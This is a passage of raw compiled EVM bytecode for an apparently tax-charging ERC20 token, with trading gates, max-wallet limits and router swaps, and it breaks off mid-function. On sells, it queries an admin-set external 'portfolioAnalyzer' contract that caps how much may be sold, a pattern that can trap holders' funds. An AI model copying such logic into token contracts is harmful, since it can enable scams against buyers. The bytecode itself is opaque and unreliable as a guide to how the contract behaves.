60002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051611c8991906130fd565b60405180910390a3505050565b6000611ca284846118c3565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114611d1c5781811015611d0e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611d0590613ae4565b60405180910390fd5b611d1b8484848403611acd565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611d91576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611d8890613b76565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611e00576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611df790613c08565b60405180910390fd5b60008103611e1957611e1483836000612871565b612717565b601260009054906101000a900460ff161561238d57611e3783610e4f565b158015611e4a5750611e4882610e4f565b155b8015611e835750600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015611ebd575061dead73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015611ed65750600f60009054906101000a900460ff16155b15611fd157601260019054906101000a900460ff16611fd057601160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680611f905750601160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b611fcf576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611fc690613c74565b60405180910390fd5b5b5b600960008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680156120745750601060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b1561211b57600a548111156120be576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016120b590613d06565b60405180910390fd5b600c546120ca83611084565b826120d591906135d8565b1115612116576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161210d90613d72565b60405180910390fd5b61238c565b600960008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680156121be5750601060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b156122e057600a54811115612208576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016121ff90613e04565b60405180910390fd5b600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16630572b0cc6040518163ffffffff1660e01b8152600401602060405180830381865afa158015612275573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906122999190613e39565b8111156122db576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016122d290613efe565b60405180910390fd5b61238b565b601060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1661238a57600c5461233d83611084565b8261234891906135d8565b1115612389576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161238090613d72565b60405180910390fd5b5b5b5b5b600061239830611084565b90506000600b5482101590508080156123bd5750601260029054906101000a900460ff165b80156123d65750600f60009054906101000a900460ff16155b801561242c5750600960008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b80156124825750601160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b80156124d85750601160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b1561251c576001600f60006101000a81548160ff021916908315150217905550612500612af0565b6000600f60006101000a81548160ff0219169083151502179055505b6000600f60009054906101000a900460ff16159050601160008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16806125d25750601160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b156125dc57600090505b6000811561270757600960008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16801561263f57506000600e54115b15612665576064600e54866126549190613458565b61265e91906134e1565b90506126e3565b600960008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680156126c057506000600d54115b156126e2576064600d54866126d59190613458565b6126df91906134e1565b90505b5b60008111156126f8576126f7873083612871565b5b808561270491906135a4565b94505b612712878787612871565b505050505b505050565b61273081600561195690919063ffffffff16565b8073ffffffffffffffffffffffffffffffffffffffff167f44d6d25963f097ad14f29f06854a01f575648a1ef82f30e562ccd3889717e33960405160405180910390a250565b61278a816005612b4090919063ffffffff16565b8073ffffffffffffffffffffffffffffffffffffffff167fa3b62bc36326052d97ea62d63c3d60308ed4c3ea8ac079dd8499f1e9c4f80c0f60405160405180910390a250565b80600960008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508015158273ffffffffffffffffffffffffffffffffffffffff167fffa9187bf1f18bf477bd0ea1bcbb64e93b6a98132473929edfce215cd9b16fab60405160405180910390a35050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036128e0576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016128d790613b76565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361294f576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161294690613c08565b60405180910390fd5b61295a838383612be7565b60008060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050818110156129e0576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016129d790613f90565b60405180910390fd5b8181036000808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550816000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254612a7391906135d8565b925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051612ad791906130fd565b60405180910390a3612aea848484612bec565b50505050565b6000612afb30611084565b905060008103612b0b5750612b3e565b6014600b54612b1a9190613458565b811115612b33576014600b54612b309190613458565b90505b612b3c81612bf1565b505b565b612b4a82826119fe565b612b89576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612b8090614022565b60405180910390fd5b60008260000160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505050565b505050565b505050565b6000600267ffffffffffffffff811115612c0e57612c0d614042565b5b604051908082528060200260200182016040528015612c3c5781602001602082028036833780820191505090505b5090503081600081518110612c5457612c53614071565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff16815250507f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015612cf9573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190612d1d91906140b5565b81600181518110612d3157612d30614071565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050612d96307f000000000000000000000000000000000000000000000000000000000000000084611acd565b7f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff1663791ac94783600084600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16426040518663ffffffff1660e01b8152600401612e1a9594939291906141db565b600060405180830381600087803b158015612e3457600080fd5b505af1158015612e48573d6000803e3d6000fd5b505050505050565b600081519050919050565b600082825260208201905092915050565b60005b83811015612e8a578082015181840152602081019050612e6f565b83811115612e99576000848401525b50505050565b6000601f19601f8301169050919050565b6000612ebb82612e50565b612ec58185612e5b565b9350612ed5818560208601612e6c565b612ede81612e9f565b840191505092915050565b60006020820190508181036000830152612f038184612eb0565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000612f3b82612f10565b9050919050565b612f4b81612f30565b8114612f5657600080fd5b50565b600081359050612f6881612f42565b92915050565b6000819050919050565b612f8181612f6e565b8114612f8c57600080fd5b50565b600081359050612f9e81612f78565b92915050565b60008060408385031215612fbb57612fba612f0b565b5b6000612fc985828601612f59565b9250506020612fda85828601612f8f565b9150509250929050565b60008115159050919050565b612ff981612fe4565b82525050565b60006020820190506130146000830184612ff0565b92915050565b6000602082840312156130305761302f612f0b565b5b600061303e84828501612f59565b91505092915050565b60006020828403121561305d5761305c612f0b565b5b600061306b84828501612f8f565b91505092915050565b6000819050919050565b600061309961309461308f84612f10565b613074565b612f10565b9050919050565b60006130ab8261307e565b9050919050565b60006130bd826130a0565b9050919050565b6130cd816130b2565b82525050565b60006020820190506130e860008301846130c4565b92915050565b6130f781612f6e565b82525050565b600060208201905061311260008301846130ee565b92915050565b6000806040838503121561312f5761312e612f0b565b5b600061313d85828601612f59565b925050602061314e85828601612f59565b9150509250929050565b60008060006060848603121561317157613170612f0b565b5b600061317f86828701612f59565b935050602061319086828701612f59565b92505060406131a186828701612f8f565b9150509250925092565b6131b481612f30565b82525050565b60006020820190506131cf60008301846131ab565b92915050565b600060ff82169050919050565b6131eb816131d5565b82525050565b600060208201905061320660008301846131e2565b92915050565b61321581612fe4565b811461322057600080fd5b50565b6000813590506132328161320c565b92915050565b6000806040838503121561324f5761324e612f0b565b5b600061325d85828601612f59565b925050602061326e85828601613223565b9150509250929050565b60006020828403121561328e5761328d612f0b565b5b600061329c84828501613223565b91505092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806132ec57607f821691505b6020821081036132ff576132fe6132a5565b5b50919050565b7f41646d696e526f6c653a2063616c6c657220646f6573206e6f7420686176652060008201527f746865204d696e74657220726f6c650000000000000000000000000000000000602082015250565b6000613361602f83612e5b565b915061336c82613305565b604082019050919050565b6000602082019050818103600083015261339081613354565b9050919050565b7f73656c6c546178206d757374206e6f742062652067726561746572207468616e60008201527f2034252021000000000000000000000000000000000000000000000000000000602082015250565b60006133f3602583612e5b565b91506133fe82613397565b604082019050919050565b60006020820190508181036000830152613422816133e6565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600061346382612f6e565b915061346e83612f6e565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff04831182151516156134a7576134a6613429565b5b828202905092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b60006134ec82612f6e565b91506134f783612f6e565b925082613507576135066134b2565b5b828204905092915050565b7f43616e6e6f7420736574206d61785472616e73616374696f6e416d6f756e742060008201527f6c6f776572207468616e20302e31250000000000000000000000000000000000602082015250565b600061356e602f83612e5b565b915061357982613512565b604082019050919050565b6000602082019050818103600083015261359d81613561565b9050919050565b60006135af82612f6e565b91506135ba83612f6e565b9250828210156135cd576135cc613429565b5b828203905092915050565b60006135e382612f6e565b91506135ee83612f6e565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0382111561362357613622613429565b5b828201905092915050565b7f627579546178206d757374206e6f742062652067726561746572207468616e2060008201527f3225202100000000000000000000000000000000000000000000000000000000602082015250565b600061368a602483612e5b565b91506136958261362e565b604082019050919050565b600060208201905081810360008301526136b98161367d565b9050919050565b7f54686520706169722063616e6e6f742062652072656d6f7665642066726f6d2060008201527f6175746f6d617465644d61726b65744d616b6572506169727300000000000000602082015250565b600061371c603983612e5b565b9150613727826136c0565b604082019050919050565b6000602082019050818103600083015261374b8161370f565b9050919050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b60006137ae602583612e5b565b91506137b982613752565b604082019050919050565b600060208201905081810360008301526137dd816137a1565b9050919050565b7f43616e6e6f7420736574206d617857616c6c6574206c6f776572207468616e2060008201527f302e352500000000000000000000000000000000000000000000000000000000602082015250565b6000613840602483612e5b565b915061384b826137e4565b604082019050919050565b6000602082019050818103600083015261386f81613833565b9050919050565b7f526f6c65733a206163636f756e7420616c72656164792068617320726f6c6500600082015250565b60006138ac601f83612e5b565b91506138b782613876565b602082019050919050565b600060208201905081810360008301526138db8161389f565b9050919050565b7f526f6c65733a206163636f756e7420697320746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b600061393e602283612e5b565b9150613949826138e2565b604082019050919050565b6000602082019050818103600083015261396d81613931565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b60006139d0602483612e5b565b91506139db82613974565b604082019050919050565b600060208201905081810360008301526139ff816139c3565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000613a62602283612e5b565b9150613a6d82613a06565b604082019050919050565b60006020820190508181036000830152613a9181613a55565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b6000613ace601d83612e5b565b9150613ad982613a98565b602082019050919050565b60006020820190508181036000830152613afd81613ac1565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000613b60602583612e5b565b9150613b6b82613b04565b604082019050919050565b60006020820190508181036000830152613b8f81613b53565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000613bf2602383612e5b565b9150613bfd82613b96565b604082019050919050565b60006020820190508181036000830152613c2181613be5565b9050919050565b7f54726164696e67206973206e6f74206163746976652e00000000000000000000600082015250565b6000613c5e601683612e5b565b9150613c6982613c28565b602082019050919050565b60006020820190508181036000830152613c8d81613c51565b9050919050565b7f427579207472616e7366657220616d6f756e742065786365656473207468652060008201527f6d61785472616e73616374696f6e416d6f756e742e0000000000000000000000602082015250565b6000613cf0603583612e5b565b9150613cfb82613c94565b604082019050919050565b60006020820190508181036000830152613d1f81613ce3565b9050919050565b7f4d61782077616c6c657420657863656564656400000000000000000000000000600082015250565b6000613d5c601383612e5b565b9150613d6782613d26565b602082019050919050565b60006020820190508181036000830152613d8b81613d4f565b9050919050565b7f53656c6c207472616e7366657220616d6f756e7420657863656564732074686560008201527f206d61785472616e73616374696f6e416d6f756e742e00000000000000000000602082015250565b6000613dee603683612e5b565b9150613df982613d92565b604082019050919050565b60006020820190508181036000830152613e1d81613de1565b9050919050565b600081519050613e3381612f78565b92915050565b600060208284031215613e4f57613e4e612f0b565b5b6000613e5d84828501613e24565b91505092915050565b7f706f7274666f6c696f416e616c797a65722072657761726473206d757374206260008201527f6520736d616c6c6572207468616e206d61782077616c6c657420616d6f756e7460208201527f2e00000000000000000000000000000000000000000000000000000000000000604082015250565b6000613ee8604183612e5b565b9150613ef382613e66565b606082019050919050565b60006020820190508181036000830152613f1781613edb565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000613f7a602683612e5b565b9150613f8582613f1e565b604082019050919050565b60006020820190508181036000830152613fa981613f6d565b9050919050565b7f526f6c65733a206163636f756e7420646f6573206e6f74206861766520726f6c60008201527f6500000000000000000000000000000000000000000000000000000000000000602082015250565b600061400c602183612e5b565b915061401782613fb0565b604082019050919050565b6000602082019050818103600083015261403b81613fff565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b6000815190506140af81612f42565b92915050565b6000602082840312156140cb576140ca612f0b565b5b60006140d9848285016140a0565b91505092915050565b6000819050919050565b60006141076141026140fd846140e2565b613074565b612f6e565b9050919050565b614117816140ec565b82525050565b600081519050919050565b600082825260208201905092915050565b6000819050602082019050919050565b61415281612f30565b82525050565b60006141648383614149565b60208301905092915050565b6000602082019050919050565b60006141888261411d565b6141928185614128565b935061419d83614139565b8060005b838110156141ce5781516141b58882614158565b97506141c083614170565b9250506001810190506141a1565b5085935050505092915050565b600060a0820190506141f060008301886130ee565b6141fd602083018761410e565b818103604083015261420f818661417d565b905061421e60608301856131ab565b61422b60808301846130ee565b969550505050505056fea26469706673582212204e390070b1b6960f30b297b7504e61521836ed94dbd19f326b3bf7ca2788efc964736f6c634300080f00330000000000000000000000001111111254eeb25477b68fb85ed929f73a960582

Deployed Bytecode

0x6080604052600436106102605760003560e01c80637048027511610144578063a9059cbb116100b6578063c8c8ebe41161007a578063c8c8ebe414610907578063cc1776d314610932578063d257b34f1461095d578063dd62ed3e14610986578063e2f45605146109c3578063f8b45b05146109ee57610267565b8063a9059cbb14610810578063b62496f51461084d578063bbc0c7421461088a578063c0246668146108b5578063c18bc195146108de57610267565b80638a8c523c116101085780638a8c523c146107285780638bad0c0a1461073f578063924de9b71461075657806395d89b411461077f5780639a7a23d6146107aa578063a457c2d7146107d357610267565b8063704802751461064557806370a082311461066e578063751039fc146106ab5780637571336a146106d65780637f1203f2146106ff57610267565b806324d7806c116101dd57806339509351116101a15780633950935114610533578063436d33401461057057806349bd5a5e146105995780634a62bb65146105c45780634f7041a5146105ef5780636ddd17131461061a57610267565b806324d7806c1461044a57806327c8f835146104875780632b112e49146104b2578063313ce567146104dd57806334086b1a1461050857610267565b806318160ddd1161022457806318160ddd14610365578063203e727e14610390578063231c5314146103b957806323b872dd146103e2578063245a7bfc1461041f57610267565b806306fdde031461026c578063095ea7b31461029757806310d5de53146102d457806312185a39146103115780631694505e1461033a57610267565b3661026757005b600080fd5b34801561027857600080fd5b50610281610a19565b60405161028e9190612ee9565b60405180910390f35b3480156102a357600080fd5b506102be60048036038101906102b99190612fa4565b610aab565b6040516102cb9190612fff565b60405180910390f35b3480156102e057600080fd5b506102fb60048036038101906102f6919061301a565b610ace565b6040516103089190612fff565b60405180910390f35b34801561031d57600080fd5b5061033860048036038101906103339190613047565b610aee565b005b34801561034657600080fd5b5061034f610b8b565b60405161035c91906130d3565b60405180910390f35b34801561037157600080fd5b5061037a610baf565b60405161038791906130fd565b60405180910390f35b34801561039c57600080fd5b506103b760048036038101906103b29190613047565b610bb9565b005b3480156103c557600080fd5b506103e060048036038101906103db9190613118565b610c9b565b005b3480156103ee57600080fd5b5061040960048036038101906104049190613158565b610dfa565b6040516104169190612fff565b60405180910390f35b34801561042b57600080fd5b50610434610e29565b60405161044191906131ba565b60405180910390f35b34801561045657600080fd5b50610471600480360381019061046c919061301a565b610e4f565b60405161047e9190612fff565b60405180910390f35b34801561049357600080fd5b5061049c610e6c565b6040516104a991906131ba565b60405180910390f35b3480156104be57600080fd5b506104c7610e92565b6040516104d491906130fd565b60405180910390f35b3480156104e957600080fd5b506104f2610ed6565b6040516104ff91906131f1565b60405180910390f35b34801561051457600080fd5b5061051d610edf565b60405161052a91906131ba565b60405180910390f35b34801561053f57600080fd5b5061055a60048036038101906105559190612fa4565b610f05565b6040516105679190612fff565b60405180910390f35b34801561057c57600080fd5b5061059760048036038101906105929190613047565b610f3c565b005b3480156105a557600080fd5b506105ae610fd9565b6040516105bb91906131ba565b60405180910390f35b3480156105d057600080fd5b506105d9610ffd565b6040516105e69190612fff565b60405180910390f35b3480156105fb57600080fd5b50610604611010565b60405161061191906130fd565b60405180910390f35b34801561062657600080fd5b5061062f611016565b60405161063c9190612fff565b60405180910390f35b34801561065157600080fd5b5061066c6004803603810190610667919061301a565b611029565b005b34801561067a57600080fd5b506106956004803603810190610690919061301a565b611084565b6040516106a291906130fd565b60405180910390f35b3480156106b757600080fd5b506106c06110cc565b6040516106cd9190612fff565b60405180910390f35b3480156106e257600080fd5b506106fd60048036038101906106f89190613238565b61113f565b005b34801561070b57600080fd5b506107266004803603810190610721919061301a565b6111e9565b005b34801561073457600080fd5b5061073d611335565b005b34801561074b57600080fd5b506107546113bc565b005b34801561076257600080fd5b5061077d60048036038101906107789190613278565b6113ce565b005b34801561078b57600080fd5b5061079461143a565b6040516107a19190612ee9565b60405180910390f35b3480156107b657600080fd5b506107d160048036038101906107cc9190613238565b6114cc565b005b3480156107df57600080fd5b506107fa60048036038101906107f59190612fa4565b6115b7565b6040516108079190612fff565b60405180910390f35b34801561081c57600080fd5b5061083760048036038101906108329190612fa4565b61162e565b6040516108449190612fff565b60405180910390f35b34801561085957600080fd5b50610874600480360381019061086f919061301a565b611651565b6040516108819190612fff565b60405180910390f35b34801561089657600080fd5b5061089f611671565b6040516108ac9190612fff565b60405180910390f35b3480156108c157600080fd5b506108dc60048036038101906108d79190613238565b611684565b005b3480156108ea57600080fd5b5061090560048036038101906109009190613047565b61177c565b005b34801561091357600080fd5b5061091c61185e565b60405161092991906130fd565b60405180910390f35b34801561093e57600080fd5b50610947611864565b60405161095491906130fd565b60405180910390f35b34801561096957600080fd5b50610984600480360381019061097f9190613047565b61186a565b005b34801561099257600080fd5b506109ad60048036038101906109a89190613118565b6118c3565b6040516109ba91906130fd565b60405180910390f35b3480156109cf57600080fd5b506109d861194a565b6040516109e591906130fd565b60405180910390f35b3480156109fa57600080fd5b50610a03611950565b604051610a1091906130fd565b60405180910390f35b606060038054610a28906132d4565b80601f0160208091040260200160405190810160405280929190818152602001828054610a54906132d4565b8015610aa15780601f10610a7657610100808354040283529160200191610aa1565b820191906000526020600020905b815481529060010190602001808311610a8457829003601f168201915b5050505050905090565b600080610ab6611ac5565b9050610ac3818585611acd565b600191505092915050565b60106020528060005260406000206000915054906101000a900460ff1681565b610afe610af9611ac5565b610e4f565b610b3d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b3490613377565b60405180910390fd5b6004811115610b81576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b7890613409565b60405180910390fd5b80600e8190555050565b7f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d81565b6000600254905090565b610bc9610bc4611ac5565b610e4f565b610c08576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bff90613377565b60405180910390fd5b670de0b6b3a76400006103e86001610c1e610baf565b610c289190613458565b610c3291906134e1565b610c3c91906134e1565b811015610c7e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c7590613584565b60405180910390fd5b670de0b6b3a764000081610c929190613458565b600a8190555050565b610cab610ca6611ac5565b610e4f565b610cea576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ce190613377565b60405180910390fd5b6001601160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001601060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550610da382611029565b610db58183610db0610baf565b611acd565b81600660006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055505050565b600080610e05611ac5565b9050610e12858285611c96565b610e1d858585611d22565b60019150509392505050565b600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6000610e658260056119fe90919063ffffffff16565b9050919050565b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6000610ebf600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16611084565b610ec7610baf565b610ed191906135a4565b905090565b60006012905090565b600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b600080610f10611ac5565b9050610f31818585610f2285896118c3565b610f2c91906135d8565b611acd565b600191505092915050565b610f4c610f47611ac5565b610e4f565b610f8b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f8290613377565b60405180910390fd5b6002811115610fcf576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fc6906136a0565b60405180910390fd5b80600d8190555050565b7f000000000000000000000000dbfb18a592bdfdc6e6d5099bf2bccbe79ea1a13481565b601260009054906101000a900460ff1681565b600d5481565b601260029054906101000a900460ff1681565b611039611034611ac5565b610e4f565b611078576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161106f90613377565b60405180910390fd5b6110818161271c565b50565b60008060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b60006110de6110d9611ac5565b610e4f565b61111d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161111490613377565b60405180910390fd5b6000601260006101000a81548160ff0219169083151502179055506001905090565b61114f61114a611ac5565b610e4f565b61118e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161118590613377565b60405180910390fd5b80601060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505050565b6111f96111f4611ac5565b610e4f565b611238576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161122f90613377565b60405180910390fd5b6001601160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001601060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506112f181611029565b80600760006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b611345611340611ac5565b610e4f565b611384576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161137b90613377565b60405180910390fd5b6001601260016101000a81548160ff0219169083151502179055506001601260026101000a81548160ff021916908315150217905550565b6113cc6113c7611ac5565b612776565b565b6113de6113d9611ac5565b610e4f565b61141d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161141490613377565b60405180910390fd5b80601260026101000a81548160ff02191690831515021790555050565b606060048054611449906132d4565b80601f0160208091040260200160405190810160405280929190818152602001828054611475906132d4565b80156114c25780601f10611497576101008083540402835291602001916114c2565b820191906000526020600020905b8154815290600101906020018083116114a557829003601f168201915b5050505050905090565b6114dc6114d7611ac5565b610e4f565b61151b576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161151290613377565b60405180910390fd5b7f000000000000000000000000dbfb18a592bdfdc6e6d5099bf2bccbe79ea1a13473ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036115a9576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016115a090613732565b60405180910390fd5b6115b382826127d0565b5050565b6000806115c2611ac5565b905060006115d082866118c3565b905083811015611615576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161160c906137c4565b60405180910390fd5b6116228286868403611acd565b60019250505092915050565b600080611639611ac5565b9050611646818585611d22565b600191505092915050565b60096020528060005260406000206000915054906101000a900460ff1681565b601260019054906101000a900460ff1681565b61169461168f611ac5565b610e4f565b6116d3576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016116ca90613377565b60405180910390fd5b80601160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff167f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df7826040516117709190612fff565b60405180910390a25050565b61178c611787611ac5565b610e4f565b6117cb576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016117c290613377565b60405180910390fd5b670de0b6b3a76400006103e860056117e1610baf565b6117eb9190613458565b6117f591906134e1565b6117ff91906134e1565b811015611841576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161183890613856565b60405180910390fd5b670de0b6b3a7640000816118559190613458565b600c8190555050565b600a5481565b600e5481565b61187a611875611ac5565b610e4f565b6118b9576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016118b090613377565b60405180910390fd5b80600b8190555050565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b600b5481565b600c5481565b61196082826119fe565b156119a0576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611997906138c2565b60405180910390fd5b60018260000160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505050565b60008073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611a6e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611a6590613954565b60405180910390fd5b8260000160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16905092915050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611b3c576040517f08c379a000000000000000000000000000000000000000000000000000000000